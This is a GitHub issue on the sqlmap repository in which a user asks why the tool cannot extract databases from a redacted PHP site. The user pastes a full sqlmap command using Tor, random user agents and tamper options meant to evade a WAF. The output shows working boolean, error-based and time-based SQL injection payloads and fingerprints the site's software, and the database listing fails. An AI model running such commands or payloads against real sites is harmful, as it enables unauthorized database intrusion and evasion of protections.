search

sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org
Other
32.72k stars 5.74k forks source link

I can't extract the db #5817

Closed 4t3nt4d0 closed 3 days ago

4t3nt4d0 commented 5 days ago

4t3nt4d0# python sqlmap.py --tor-type=SOCKS5 -u http://xxxxxxxxxxxxxxxxx/ler_topico.php?id=6 --batch --random-agent --tamper=space2comment --level=5 --risk=3 --drop-set-cookie --threads 10 --no-cast --wizard --dbs H _[)]___ {1.8.3.15#dev} |_ -| . ['] | .'| . | |_| [.]|||,| | ||V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 04:33:49 /2024-11-25/ [04:33:49] [INFO] starting wizard interface POST data (--data) [Enter for None]: Injection difficulty (--level/--risk). Please choose: [1] Normal (default) [2] Medium [3] Hard

1 Enumeration (--banner/--current-user/etc). Please choose: [1] Basic (default) [2] Intermediate [3] All > 1 sqlmap is running, please wait..
[04:33:50] [CRITICAL] WAF/IPS identified as 'Comodo' [04:33:50] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=6' AND 4367=4367 AND 'qfJx' LIKE 'qfJx
Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: id=6' AND EXTRACTVALUE(6071,CONCAT(0x5c,0x7162627071,(SELECT (ELT(6071=6071,1))),0x71717a6b71)) AND 'fEaJ' LIKE 'fEaJ Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=6' AND (SELECT 8808 FROM (SELECT(SLEEP(5)))QOVL) AND 'WgRv' LIKE 'WgRv --- [04:33:50] [INFO] resumed: '10.2.44-MariaDB' web application technology: PHP 5.6.40 back-end DBMS: MySQL >= 5.1 (MariaDB fork) banner: '10.2.44-MariaDB' [04:33:50] [INFO] resumed: '' current user: '' [04:33:50] [INFO] resumed: '' current database: '' [04:33:50] [INFO] resumed: '' multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N [04:33:51] [WARNING] time-based comparison requires larger statistical model, please wait........................ (done) [04:33:57] [ERROR] unable to retrieve the number of databases [04:33:57] [INFO] resumed: '' [04:33:57] [CRITICAL] unable to retrieve the database names
[*] ending @ 04:33:57 /2024-11-25/

stamparm commented 3 days ago

image

4t3nt4d0 commented 3 days ago

Waf protect